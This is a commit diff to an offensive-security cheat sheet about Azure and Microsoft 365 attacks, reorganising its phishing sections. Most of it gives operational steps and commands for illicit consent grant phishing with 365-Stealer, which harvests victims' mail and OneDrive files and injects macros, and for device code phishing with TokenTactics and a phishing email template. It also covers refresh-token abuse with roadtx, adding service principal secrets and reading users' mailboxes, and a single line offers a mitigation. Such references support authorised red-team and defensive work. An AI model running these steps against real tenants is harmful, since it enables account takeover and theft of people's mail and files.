Azure Phishing techniques

2023-11-18 22:30:09 +01:00 · 2023-11-18 22:30:09 +01:00 · 1285fd980b
parent 917c0e8e68
commit 1285fd980b
5 changed files with 161 additions and 93 deletions
--- a/docs/cloud/azure/Cloud
+++ b/docs/cloud/azure/Cloud
@ -17,12 +17,6 @@
    * [Enumerate manually](#enumerate-manually)
    * [Enumeration methodology](#enumeration-methodology)
 * [Phishing with Evilginx2](#phishing-with-evilginx2)
 * [Illicit Consent Grant](#illicit-consent-grant)
    * [Register Application](#register-application)
    * [Configure Application](#configure-application)
    * [Setup 365-Stealer (Deprecated)](#setup-365-stealer-deprecated)
    * [Setup Vajra](#setup-vajra)
 * [Device Code Phish](#device-code-phish)
 * [Token from Managed Identity](#token-from-managed-identity)
    * [Azure API via Powershell](#azure-api-via-powershell)
    * [Azure API via Python Version](#azure-api-via-python-version)
@ -466,91 +460,6 @@ PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\private.key C:\Users\User
 : lures get-url 0
 ```
 ## Illicit Consent Grant
 > The attacker creates an Azure-registered application that requests access to data such as contact information, email, or documents. The attacker then tricks an end user into granting consent to the application so that the attacker can gain access to the data that the target user has access to. 
 Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMSAuthorizationPolicy).PermissionGrantPolicyIdsAssignedToDefaultUserRole`
 * **Disable user consent** : Users cannot grant permissions to applications.
 * **Users can consent to apps from verified publishers or your organization, but only for permissions you select** : All users can only consent to apps that were published by a verified publisher and apps that are registered in your tenant
 * **Users can consent to all apps** : allows all users to consent to any permission which doesn't require admin consent,
 * **Custom app consent policy**
 ### Register Application
 1. Login to https://portal.azure.com > Azure Active Directory
 2. Click on **App registrations** > **New registration**
 3. Enter the Name for our application
 4. Under support account types select **"Accounts in any organizational directory (Any Azure AD directory - Multitenant)"**
 5. Enter the Redirect URL. This URL should be pointed towards our 365-Stealer application that we will host for hosting our phishing page. Make sure the endpoint is `https://<DOMAIN/IP>:<PORT>/login/authorized`.
 6. Click **Register** and save the **Application ID**
 ### Configure Application
 1. Click on `Certificates & secrets`
 2. Click on `New client secret` then enter the **Description** and click on **Add**.
 3. Save the **secret**'s value.
 4. Click on API permissions > Add a permission
 5. Click on Microsoft Graph > **Delegated permissions**
 6. Search and select the below mentioned permissions and click on Add permission
    * Contacts.Read 
    * Mail.Read / Mail.ReadWrite
    * Mail.Send
    * Notes.Read.All
    * Mailboxsettings.ReadWrite
    * Files.ReadWrite.All 
    * User.ReadBasic.All
    * User.Read
 ### Setup 365-Stealer (Deprecated)
 :warning: Default port for 365-Stealer phishing is 443
 - Run XAMPP and start Apache
 - Clone 365-Stealer into `C:\xampp\htdocs\`
    * `git clone https://github.com/AlteredSecurity/365-Stealer.git`
 - Install the requirements
    * Python3
    * PHP CLI or Xampp server
    * `pip install -r requirements.txt`
 - Enable sqlite3 (Xampp > Apache config > php.ini) and restart Apache
 - Edit `C:/xampp/htdocs/yourvictims/index.php` if needed
    - Disable IP whitelisting `$enableIpWhiteList = false;`
 - Go to 365-Stealer Management portal > Configuration (http://localhost:82/365-stealer/yourVictims)
    - **Client Id** (Mandatory): This will be the Application(Client) Id of the application that we registered.
    - **Client Secret** (Mandatory): Secret value from the Certificates & secrets tab that we created.
    - **Redirect URL** (Mandatory): Specify the redirect URL that we entered during registering the App like `https://<Domain/IP>/login/authorized` 
    - **Macros Location**: Path of macro file that we want to inject.
    - **Extension in OneDrive**: We can provide file extensions that we want to download from the victims account or provide `*` to download all the files present in the victims OneDrive. The file extensions should be comma separated like txt, pdf, docx etc. 
    - **Delay**: Delay the request by specifying time in seconds while stealing
 - Create a Self Signed Certificate to use HTTPS
 - Run the application either click on the button or run this command : `python 365-Stealer.py --run-app`
    - `--no-ssl`: disable HTTPS
    - `--port`: change the default listening port
    - `--token`: provide a specific token
    - `--refresh-token XXX --client-id YYY --client-secret ZZZ`: use a refresh token
 - Find the Phishing URL: go to `https://<IP/Domain>:<Port>` and click on **Read More** button or in the console.
 ### Setup Vajra
 > Vajra is a UI-based tool with multiple techniques for attacking and enumerating in the target's Azure environment. It features an intuitive web-based user interface built with the Python Flask module for a better user experience. The primary focus of this tool is to have different attacking techniques all at one place with web UI interfaces. - https://github.com/TROUBLE-1/Vajra
 **Mitigation**: Enable `Do not allow user consent` for applications in the "Consent and permissions menu".
 ## Device Code Phish
 Requirements:
 * Azure AD / Office 365 E3 Subscription
 Exploitation:
 * Import TokenTactics: `PS C:\TokenTactics> Import-Module .\TokenTactics.psd1`
 * Request a device code for the Azure Graph API using TokenTactics: `Get-AzureToken -Client Graph`
 * Replace `<REPLACE-WITH-DEVCODE-FROM-TOKENTACTICS>` in the [phishing email](https://github.com/rvrsh3ll/TokenTactics/blob/main/resources/DeviceCodePhishingEmailTemplate.oft)
 * Leave TokenTactics running in the PowerShell window and send the phishing email
 * Targeted user will follow the link to https://microsoft.com/devicelogin and complete the Device Code form
 * Enjoy your **Access Token** & **Refresh Token**
 ## Token from Managed Identity
--- a/docs/cloud/azure/azure-access-and-token.md
+++ b/docs/cloud/azure/azure-access-and-token.md
@ -5,7 +5,16 @@
 Decode access tokens: [jwt.ms](https://jwt.ms/)
-* Use token
+* Request an access token using a service principal password
    ```ps1
    curl --location --request POST 'https://login.microsoftonline.com/<tenant-name>/oauth2/v2.0/token' \
    --header 'Content-Type: application/x-www-form-urlencoded' \
    --data-urlencode 'client_id=<client-id>' \
    --data-urlencode 'scope=https://graph.microsoft.com/.default' \
    --data-urlencode 'client_secret=<client-secret>' \
    --data-urlencode 'grant_type=client_credentials'
    ```
 * Use an access token
    ```ps1
    # use the jwt
    $token = "eyJ0eXAiO..."
@ -46,6 +55,38 @@ execute_bof /opt/CS-Remote-OPs-BOF/Remote/office_tokens/office_tokens.x64.o --fo
 ```
 ## FOCI Refresh Token
 FOCI allows applications registered with Azure AD to share tokens, minimizing the need for separate authentications when a user accesses multiple applications that are part of the same "family."
 * [secureworks/family-of-client-ids-research/](https://github.com/secureworks/family-of-client-ids-research/blob/main/scope-map.txt) - Research into Undocumented Behavior of Azure AD Refresh Tokens
 **Generate tokens**   
 ```ps1
 roadtx gettokens --refresh-token <refresh-token> -c <foci-id> -r https://graph.microsoft.com 
 roadtx gettokens --refresh-token <refresh-token> -c 04b07795-8ddb-461a-bbee-02f9e1bf7b46
 ```
 ```
 scope                                       resource                                                          client                              
 .default                                    04b07795-8ddb-461a-bbee-02f9e1bf7b46                              04b07795-8ddb-461a-bbee-02f9e1bf7b46
                                            1950a258-227b-4e31-a9cf-717495945fc2                              1950a258-227b-4e31-a9cf-717495945fc2
                                            https://graph.microsoft.com                                       00b41c95-dab0-4487-9791-b9d2c32c80f2
                                                                                                              04b07795-8ddb-461a-bbee-02f9e1bf7b46
                                            https://graph.windows.net                                         00b41c95-dab0-4487-9791-b9d2c32c80f2
                                                                                                              04b07795-8ddb-461a-bbee-02f9e1bf7b46
                                            https://outlook.office.com                                        00b41c95-dab0-4487-9791-b9d2c32c80f2
                                                                                                              04b07795-8ddb-461a-bbee-02f9e1bf7b46
 Files.Read.All                              d3590ed6-52b3-4102-aeff-aad2292ab01c                              d3590ed6-52b3-4102-aeff-aad2292ab01c
                                            https://graph.microsoft.com                                       d3590ed6-52b3-4102-aeff-aad2292ab01c
                                            https://outlook.office.com                                        1fec8e78-bce4-4aaf-ab1b-5451cc387264
 Mail.ReadWrite.All                          https://graph.microsoft.com                                       00b41c95-dab0-4487-9791-b9d2c32c80f2
                                            https://outlook.office.com                                        00b41c95-dab0-4487-9791-b9d2c32c80f2
                                            https://outlook.office365.com                                     00b41c95-dab0-4487-9791-b9d2c32c80f2
 ```
 ## Primary Refresh Token
 * Use PRT token
--- a/docs/cloud/azure/azure-enumeration.md
+++ b/docs/cloud/azure/azure-enumeration.md
@ -2,7 +2,7 @@
 ## OSINT AAD - Recon Domains
-Extract openly available information for the given tenant: https://aadinternals.com/osint/
+Extract openly available information for the given tenant: [aadinternals.com/osint](https://aadinternals.com/osint/)
 ```ps1
 Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table
--- a/docs/cloud/azure/azure-phishing.md
+++ b/docs/cloud/azure/azure-phishing.md
@ -2,5 +2,93 @@
 ## Illicit Consent Grant
 > The attacker creates an Azure-registered application that requests access to data such as contact information, email, or documents. The attacker then tricks an end user into granting consent to the application so that the attacker can gain access to the data that the target user has access to. 
 Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMSAuthorizationPolicy).PermissionGrantPolicyIdsAssignedToDefaultUserRole`
 * **Disable user consent** : Users cannot grant permissions to applications.
 * **Users can consent to apps from verified publishers or your organization, but only for permissions you select** : All users can only consent to apps that were published by a verified publisher and apps that are registered in your tenant
 * **Users can consent to all apps** : allows all users to consent to any permission which doesn't require admin consent,
 * **Custom app consent policy**
 ### Register Application
 1. Login to https://portal.azure.com > Azure Active Directory
 2. Click on **App registrations** > **New registration**
 3. Enter the Name for our application
 4. Under support account types select **"Accounts in any organizational directory (Any Azure AD directory - Multitenant)"**
 5. Enter the Redirect URL. This URL should be pointed towards our 365-Stealer application that we will host for hosting our phishing page. Make sure the endpoint is `https://<DOMAIN/IP>:<PORT>/login/authorized`.
 6. Click **Register** and save the **Application ID**
 ### Configure Application
 1. Click on `Certificates & secrets`
 2. Click on `New client secret` then enter the **Description** and click on **Add**.
 3. Save the **secret**'s value.
 4. Click on API permissions > Add a permission
 5. Click on Microsoft Graph > **Delegated permissions**
 6. Search and select the below mentioned permissions and click on Add permission
    * Contacts.Read 
    * Mail.Read / Mail.ReadWrite
    * Mail.Send
    * Notes.Read.All
    * Mailboxsettings.ReadWrite
    * Files.ReadWrite.All 
    * User.ReadBasic.All
    * User.Read
 ### Setup 365-Stealer (Deprecated)
 :warning: Default port for 365-Stealer phishing is 443
 - Run XAMPP and start Apache
 - Clone 365-Stealer into `C:\xampp\htdocs\`
    * `git clone https://github.com/AlteredSecurity/365-Stealer.git`
 - Install the requirements
    * Python3
    * PHP CLI or Xampp server
    * `pip install -r requirements.txt`
 - Enable sqlite3 (Xampp > Apache config > php.ini) and restart Apache
 - Edit `C:/xampp/htdocs/yourvictims/index.php` if needed
    - Disable IP whitelisting `$enableIpWhiteList = false;`
 - Go to 365-Stealer Management portal > Configuration (http://localhost:82/365-stealer/yourVictims)
    - **Client Id** (Mandatory): This will be the Application(Client) Id of the application that we registered.
    - **Client Secret** (Mandatory): Secret value from the Certificates & secrets tab that we created.
    - **Redirect URL** (Mandatory): Specify the redirect URL that we entered during registering the App like `https://<Domain/IP>/login/authorized` 
    - **Macros Location**: Path of macro file that we want to inject.
    - **Extension in OneDrive**: We can provide file extensions that we want to download from the victims account or provide `*` to download all the files present in the victims OneDrive. The file extensions should be comma separated like txt, pdf, docx etc. 
    - **Delay**: Delay the request by specifying time in seconds while stealing
 - Create a Self Signed Certificate to use HTTPS
 - Run the application either click on the button or run this command : `python 365-Stealer.py --run-app`
    - `--no-ssl`: disable HTTPS
    - `--port`: change the default listening port
    - `--token`: provide a specific token
    - `--refresh-token XXX --client-id YYY --client-secret ZZZ`: use a refresh token
 - Find the Phishing URL: go to `https://<IP/Domain>:<Port>` and click on **Read More** button or in the console.
 ### Vajra
 > Vajra is a UI-based tool with multiple techniques for attacking and enumerating in the target's Azure environment. It features an intuitive web-based user interface built with the Python Flask module for a better user experience. The primary focus of this tool is to have different attacking techniques all at one place with web UI interfaces. - https://github.com/TROUBLE-1/Vajra
 **Mitigation**: Enable `Do not allow user consent` for applications in the "Consent and permissions menu".
 ### Roadtx
 * Use the authorization code flow in roadtx to get token
 ```ps1
 roadtx codeauth -c <app-id> -r msgraph -t <tenant-id> <0.A....> -ru 'https://<phish-app>/redir' -p <app-secret>
 ```
 ## Device Code Phishing
 * Using roadtool: `roadtx gettokens -u user@domain.lab --device-code`
 * Using TokenTactics to request a token for Azure Graph API using a device code
    ```ps1
    Import-Module .\TokenTactics.psd1
    Get-AzureToken -Client Graph
    ```
 * Replace `<REPLACE-WITH-DEVCODE-FROM-TOKENTACTICS>` in the [phishing email](https://github.com/rvrsh3ll/TokenTactics/blob/main/resources/DeviceCodePhishingEmailTemplate.oft)
 * Leave TokenTactics running in the PowerShell window and send the phishing email
 * Targeted user will follow the link to https://microsoft.com/devicelogin and complete the Device Code form
 * Enjoy your **access token** and **refresh token**
--- a/docs/cloud/azure/azure-services.md
+++ b/docs/cloud/azure/azure-services.md
@ -5,6 +5,22 @@
 Runbook must be SAVED and PUBLISHED before running it.
 ## Azure Service Principal
 * Generate a new service principal password/secret
    ```ps1
    Import-Module Microsoft.Graph.Applications
    Connect-MgGraph 
    $servicePrincipalId = "<service-principal-id>"
    $params = @{
        passwordCredential = @{
            displayName = "NewCreds"
        }
    }
    Add-MgServicePrincipalPassword -ServicePrincipalId $servicePrincipalId -BodyParameter $params
    ```
 ## Office 365
@ -14,3 +30,17 @@ Runbook must be SAVED and PUBLISHED before running it.
 TokenTacticsV2> RefreshTo-MSTeamsToken -domain domain.local
 AADInternals> Get-AADIntTeamsMessages -AccessToken $MSTeamsToken.access_token | Format-Table id,content,deletiontime,*type*,DisplayName
 ```
 ## Outlook
 * Read user messages
    ```ps1
    Get-MgUserMessage -UserId <user-id> | ft
    Get-MgUserMessageContent -OutFile mail.txt -UserId <user-id> -MessageId <message-id>
    ```
 ## References
 * [Microsoft Graph - servicePrincipal: addPassword](https://learn.microsoft.com/en-us/graph/api/serviceprincipal-addpassword?view=graph-rest-1.0&tabs=powershell)